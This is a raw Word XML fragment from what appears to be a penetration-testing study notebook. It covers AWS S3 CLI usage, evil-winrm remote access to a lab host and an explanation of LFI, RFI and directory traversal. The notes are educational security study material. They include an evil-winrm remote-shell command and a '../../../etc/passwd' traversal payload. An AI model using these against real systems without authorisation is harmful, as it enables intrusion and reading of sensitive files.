    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/images/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To download all files in the images/vacation/ pseudo-directory and then put the contents in a local folder ./vacation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 sync s3://my-awesome-bucket/images/vacation/ ./vacation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload Files to a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To upload files (myfile.txt) into a pseudo-directory (documents/project/):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp myfile.txt s3://my-awesome-bucket/documents/project/myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAD">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aievyyu2c4ld" w:id="227"/>
      <w:bookmarkEnd w:id="227"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WinRM (Windows Remote Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On linux, you can use evil-winrm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm -i 10.129.136.91 -u [username]-p [password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vcram47f0kl7" w:id="228"/>
      <w:bookmarkEnd w:id="228"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI and RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When testing a file upload form</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we should always determine what happens when a file is uploaded twice. If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server. Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b03u8612i27n" w:id="229"/>
      <w:bookmarkEnd w:id="229"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5w38mpqcyc6s" w:id="230"/>
      <w:bookmarkEnd w:id="230"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI vs. Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBF">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we examine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LFI), let's take a moment to explore the differences between File Inclusion and Directory Traversal. These two concepts often get mixed up by penetration testers and security professionals. If we confuse the type of vulnerability we find, we may miss an opportunity to obtain code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As covered in the last Learning Unit, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory traversal vulnerabilities to obtain the contents of a file outside of the web server's web root. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File inclusion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities allow us to "include" a file in the application's running code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means we can use file inclusion vulnerabilities to execute local or remote files, while directory traversal only allows us to read the contents of a file. Since we can include files in the application's running code with file inclusion vulnerabilities, we can also display the file contents of non-executable files. For example, if we leverage a directory traversal vulnerability in a PHP web application and specify the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the source code of the PHP file will be displayed. On the other hand, when dealing with a file inclusion vulnerability, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file will be executed instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ldnibm5l03n5" w:id="231"/>
      <w:bookmarkEnd w:id="231"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Responder (Tier 2 Starting Point HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: LFI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application. A common example is when an application uses the path to a file as input in the URL. If the application treats this input as trusted, and the required sanitary checks are not performed on this input, then the attacker can exploit it by using the ../ string in the inputted file name and eventually view sensitive files in the local file system. In some limited cases, an LFI can lead to code execution as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You often need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled in order to do it on PHP site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI vs. RFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: LFI is using files that are already stored on the web server. RFI is being able to upload your own files and execute those files on the web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">Note: The working directory is often </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. So that's why we doing something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
